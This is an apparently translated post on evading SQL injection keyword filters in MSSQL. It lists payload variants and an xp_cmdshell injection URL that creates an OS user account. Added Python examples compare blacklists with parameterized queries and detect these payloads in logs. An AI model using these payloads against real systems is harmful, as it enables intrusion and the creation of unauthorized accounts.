I suddenly wondered whether there is any way to get around the restrictions placed on SQL injection. Looking around online, the methods people mention are mostly for getting past filters on "and", "'" and "=". That is some progress, but there are still keywords that these methods do not bypass. Since I do not often break into sites myself, I will not comment on how well the filters above hold up, but it is safe to say the results are not very good...
From what I have collected, most anti-injection programs filter the following keywords:
and | Select | Update | Chr | Delete | %20from | ; | Insert | Mid | Master. | Set | =
The hardest one to deal with is the SELECT keyword. So how do we get past these? The problem is not completely solved, but I will still share what I have and hope it gives others some ideas.
Here are some of my own ideas for getting past keyword filtering, collected below.
1. Bypass using encoding
For example URL encoding or ASCII encoding. "or 1=1" becomes %6f%72%20%31%3d%31, and "test" can be written as a CHAR() concatenation such as CHAR(116)+CHAR(101)+CHAR(115)+CHAR(116).
2. Bypass using whitespace
For example, use two spaces instead of one, use a tab instead of a space, or remove the spaces altogether, as in or'swords'='swords'. Because MSSQL is lenient about whitespace, dropping the spaces around or 'swords' does not affect execution.
3. Use a string comparison instead
Instead of the classic or 1=1 test, use a comparison such as or 'swords' = 'swords'. This method is already discussed online.
4. Bypass using the type-conversion modifier N
This one is a genuinely good idea: besides helping to bypass restrictions to some extent, it has other uses, which is worth thinking about. Usage looks like or 'swords' = N'swords'. The uppercase N tells MSSQL Server to treat the string as nvarchar; it acts as a type conversion and does not change the injected statement itself, but it can get past an IDS that relies on matching known patterns.
5. Bypass by splitting strings with +
How effective this is remains to be tested, but it is a method nonetheless. For example: or 'swords' = 'sw' + 'ords'; EXEC('in' + 'sert into ' + '...')
6. Bypass using LIKE
Why did I not think of this before? For example or 'swords' like 'sw'. Clearly this gets past the restrictions on "=" and ">" easily...
7. Bypass using IN
Similar to the LIKE idea above, for example or 'swords' in ('swords')
8. Bypass using BETWEEN
For example or 'swords' between 'rw' and 'tw'
9. Bypass using > or <
or ' swords ' > ' SW '
or ' swords ' < ' tw '
or 1<3
......
10. Bypass using comments
Replace spaces with /**/, for example: UNION/**/Select/**/user,pwd from tbluser
Use /**/ to split up sensitive words, for example: u/**/nion/**/se/**/lect/**/user,pwd from tbluser
11. Bypass using hex; in general an IDS cannot detect this
0x730079007300610064006d0069006e00 =hex (SysAdmin)
0x640062005f006f0077006e0065007200 =hex (db_owner)
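What all eleven items have in common is that the filter inspects the raw input for keywords while the database parses the assembled statement. The following is an added example, not code from the original post, that puts the blacklist from the keyword list above in front of a string-concatenated query and beside it a parameterized query, both run against a small in-memory SQLite table. The table name tbluser and the columns user and pwd follow the post's own examples; the rows and the probe strings are constructed here.

```python
"""Added example, not code from the original post: a keyword blacklist of the
kind listed above versus a parameterized query, run against a small SQLite
table in memory. The table name tbluser and its columns user/pwd follow the
post's examples; the rows are constructed here."""
import sqlite3

# Blacklist taken from the post's keyword list. Substring matching like this
# is exactly what the string-comparison and IN/BETWEEN variants slip past.
BLACKLIST = ["and", "select", "update", "chr", "delete", " from", ";",
             "insert", "mid", "master.", "set", "="]


def blacklist_blocks(value: str) -> bool:
    """Return True if the naive filter would reject this input."""
    lowered = value.lower()
    return any(word in lowered for word in BLACKLIST)


def setup_db() -> sqlite3.Connection:
    """Constructed sample table with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbluser (user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO tbluser VALUES (?, ?)",
                     [("alice", "pw-alice"), ("bob", "pw-bob")])
    return conn


def lookup_concat(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable lookup: string concatenation guarded only by the blacklist.
    Input that passes the blacklist is still parsed as SQL."""
    if blacklist_blocks(username):
        return []
    sql = ("SELECT user FROM tbluser WHERE user = '" + username
           + "' ORDER BY user")
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn: sqlite3.Connection, username: str) -> list:
    """Hardened lookup: the value is bound as a parameter and is never
    interpreted as SQL, so no keyword filtering is needed at all."""
    sql = "SELECT user FROM tbluser WHERE user = ? ORDER BY user"
    return [row[0] for row in conn.execute(sql, (username,))]


if __name__ == "__main__":
    db = setup_db()
    probe = "' or 'swords' in ('swords') or '"  # the IN variant from item 7
    print(blacklist_blocks("' or 1=1 --"))      # True: '=' is on the list
    print(blacklist_blocks("Sandra"))           # True: false positive on 'and'
    print(lookup_concat(db, probe))             # ['alice', 'bob']: filter missed it
    print(lookup_param(db, probe))              # []: treated as a literal name
```

The blacklist both misses the IN form (no banned substring in it) and rejects a legitimate name like "Sandra" because it contains "and"; the parameterized version needs neither the list nor the encoding tricks to be considered, because the bound value never reaches the SQL parser.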
In addition, against the common kind of filter we can consider assignment: first declare a variable a, assign our instruction to a, and then invoke a so that the command we entered is finally executed. The variable a can hold any command. As follows:
declare @a sysname
Select @a=
EXEC Master.dbo.xp_cmdshell @a
Effect: http://www.hackline.net/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--
Here 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 means "net User Angel Pass/add".
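The variable-assignment trick, the hex literals in item 11 and the comment splitting in item 10 all rely on the same gap: the filter reads the request as sent, the database reads it after decoding. A filter or log review that decodes first closes much of that gap, and a database account that cannot reach master.dbo.xp_cmdshell closes the rest. The following is an added example, not code from the original post, of normalizing a request's query string (URL decoding, stripping /**/ comments, collapsing whitespace, and decoding 0x literals as UTF-16LE nvarchar text) before matching tokens. The log lines and the indicator list are constructed for this example; the hex literal is the hex(sysadmin) value from item 11.

```python
"""Added example, not code from the original post: normalize a request's
query string before keyword matching, undoing the URL encoding, /**/
comment splitting and 0x hex literals described above so that the check
sees what the database would see. The log lines and the indicator list
are constructed for this example and are not complete."""
import re
from urllib.parse import unquote

# Tokens to look for after normalization; the names come from the post.
INDICATORS = ("xp_cmdshell", "master.", "declare ", "exec ", "union", "select")

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def decode_hex_literal(match):
    """Replace an MSSQL 0x literal with its text when it decodes as UTF-16LE
    (nvarchar), so the hex form of 'sysadmin' reads as sysadmin again."""
    digits = match.group(1)
    if len(digits) % 2:
        return match.group(0)
    try:
        text = bytes.fromhex(digits).decode("utf-16-le")
    except UnicodeDecodeError:
        return match.group(0)
    return "<hex:" + text + ">" if text.isprintable() else match.group(0)


def normalize(query: str) -> str:
    """Undo the layers that the keyword filters in the post are fooled by."""
    text = unquote(query)                  # %6f%72 -> or, %20 -> space
    text = re.sub(r"/\*.*?\*/", "", text)  # u/**/nion -> union
    text = re.sub(r"\s+", " ", text)       # tabs and double spaces -> one space
    text = HEX_LITERAL.sub(decode_hex_literal, text)
    return text.lower()


def findings(log_line: str) -> list:
    """Indicators present once the line is normalized, in INDICATORS order."""
    normalized = normalize(log_line)
    return [token for token in INDICATORS if token in normalized]


# Constructed access-log lines modelled on the requests discussed above.
CONSTRUCTED_LOG = [
    "GET /show.asp?id=42 200",
    "GET /show.asp?id=1%20u/**/nion%20se/**/lect%20user,pwd%20from%20tbluser 200",
    "GET /show.asp?id=1;declare%20@a%20sysname%20select%20@a="
    "0x730079007300610064006d0069006e00%20exec%20master.dbo.xp_cmdshell%20@a;-- 500",
]

if __name__ == "__main__":
    for line in CONSTRUCTED_LOG:
        print(findings(line), "<-", normalize(line))
```

Matching after normalization is still a detection measure, not a fix: it reports the comment-split UNION SELECT and the declare/exec chain, but an application that binds parameters and runs under an account without xp_cmdshell has nothing for this check to find.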
Methods for bypassing SQL injection restrictions